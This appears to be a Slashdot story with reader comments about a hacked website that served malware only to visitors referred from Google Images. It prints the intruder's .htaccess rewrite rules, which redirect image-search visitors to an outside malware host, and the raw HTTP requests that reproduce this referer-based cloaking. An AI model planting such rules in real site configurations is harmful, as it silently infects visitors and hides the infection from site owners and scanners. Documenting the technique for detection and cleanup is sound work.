Image Searchers Snared By Malware 144
A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?
It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
then the normal page would be returned. But if you entered these commands:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/
then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.
(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:
GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/
So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)
Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)
Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)
Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.
This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)
Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4¶meter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>
which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)
It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.
But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.
And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?
Should Be Shot (Score:3, Insightful)
Malware and Virus authors should be lined up against a wall and shot. They are cancers and need to be irradiated.
orly? (Score:5, Insightful)
While I use Windows on the desktop to manage my linux servers like most admins, I find it hard to believe that 90% of all break-ins were caused by an administrator's Windows box getting owned first, to capture their password/login info. That means only 10% of the boxes were directly attacked and owned, yet my logs show overwhelming amount of tries to do just that. This would mean that 90% of the pwned Linux servers are really the fault of Microsoft Windows, and just smacks of bogus accounting.
Why not buy mom antivirus? (Score:2, Insightful)
The free antivirus packages are fine, there is no need to pay for one.
Windoze an issue again? (Score:2, Insightful)
Okay, insert obligatory "One more reason not to use Windows" comment here, after all, this is Slashdork.
Yup, Linux and OSX can get infected as well, but it's harder to do so. Especially if you approach it from the point of view that it can happen to you. If you just have to use a Windoze tool, do it via a VM of some sort, pick your fave brand of VM to do so. Some tools (native VMware VI management tools) are only available for Windoze, so I use a VM to run those tools. Other than that, there are options, even for those poor admins that are CLI challenged, for managing stuff without using Windows.
If you just have to use Windoze because all us Linux g33ks are really l4m3rz and Windoze really is the sh1tz, then Obi Wan, use your mastery of that platform and show us that you're not just all hat and no cattle. Put in the extra time and effort to use your platform of choice without contributing to the delinquency of those less enlightened than you who think that your site is safe.
Re:This hurts.... (Score:3, Insightful)
Man, this is how I view my porn, and I use that method just to be safe! What now :(
A live disc?
And this is why I'm buying a Mac (Score:5, Insightful)
I've got an old Mac at work I use for various tasks, but I use Windows at home. And it's loaded up with all of the standard defenses... firewalls, anti virus, malwarebytes, spybot s&d, you name it. And yet Windows boxes are still getting owned. And its not even necessarily "bad" websites that are spreading this stuff... porn, torrent sites, etc. There are a lot of websites out there that have no idea that they've been owned, and that they're spreading this filth to Windows machines. The latest trojans with "Internet Security 2010" infect Windows boxes so badly that it often takes longer to completely clean them than it does to just throw up your hands and decide to nuke and pave.
I know Macs will eventually be a bigger target when they get more of the market, but after one of my family machines became infected... again, despite having all of the necessary security software... I decided it was time to spring for a Mac Mini at home. Better that the wife and kids learn a different OS than Daddy pulling all of his hair out because of yet another damn trojan... despite best efforts to the contrary.
Re:Should Be Shot (Score:3, Insightful)
What we -should- do is focus on things that we can actually benefit from. Instead of mass-murder, why not fix the internet by fixing javascript (ie. dis, fucking, allow, whitelist basis only), fixing flash (bye), fixing CSS (stop reading my history and stop scanning my ports!) and fixing HTML so we don't need to rely on stupid things (flash, silverlight, the thing Google made) to make browsing an enjoyable experience.
I can deliver you a browser that is virtually unexploitable. Firefox running with NoScript, Flash on a whitelist basis and a few other security-related add-ons - it will be -very- secure. Why not make these security (pre)cautions _mandatory_ in browsers that come with purchasable operating systems?
Honestly, just making javascript operate on a whitelist basis only would reduce online malware attacks by about 99.5%.
Re:Swimming against the current (Score:4, Insightful)
Shouldn't we be happy about this? I mean, they aren't even TRYING to attack a regular surfer, but only one who comes through google images.
Yeah, because everyone knows Google Images users are Slightly Irregular.
That means they are trying a pretty limiting technique which I presume is because that all other methods will not yield as good results.
Or it's a proof-of-concept implementation being tested for more insidious deployment, say attacking only those who are coming from a (your!) bank's domain, or a government site, or a link from Google Mail embedded in an e-mail's image fetch to confirm your identity as a Chinese dissident.
Re:Should Be Shot (Score:2, Insightful)
If those non-technical users are able to create security holes, than that's the engineer's fault.
Re:Should Be Shot (Score:3, Insightful)
I'm not saying that nontechnical users create security flaws, I'm saying that they demand features that cause security flaws, and the engineers that know better are not in positions to deny them the features. If a high payed media PHB demands that the website for [NEW HIT MOVIE] be made entirely with flash, a lowly engineer pointing out that flash is insecure is not going to get anywhere.
The only way to win is to not play (Score:3, Insightful)
The very idea of "verifying that a site is not hacked" is ultimately just as flawed as running a virus scanner to verify that you don't have a virus installed. Once a system is compromised, you can't trust it to help you find the problem. Checking to see if it happens to be serving malware right now, isn't reliable since the malware gets to decide whether or not to act suspiciously, and making decisions based on referer and user-agent is really just the tip of the iceberg compared to what is possible. What if it randomly decides to serve malware on 0.01% of the requests? You'll never be able to diagnose it that way, and in the unlikely event that you do happen to see something suspicious, you're going to start questioning yourself when it turns out to not be repeatable.
Don't install the malware in the first place. I won't say that defending in depth beyond that point is totally useless, but it's pretty close to useless. Once you're infected: game over, you lost.
Change result to giant image (Score:3, Insightful)
I never understood why Google wants to load the site as a frame, which is unimaginably distracting and often the image is difficult to find. Rather, if they took a screenshot into the cache and moved the cursor automatically to the image, then it'd be more convenient, more reliable and safer.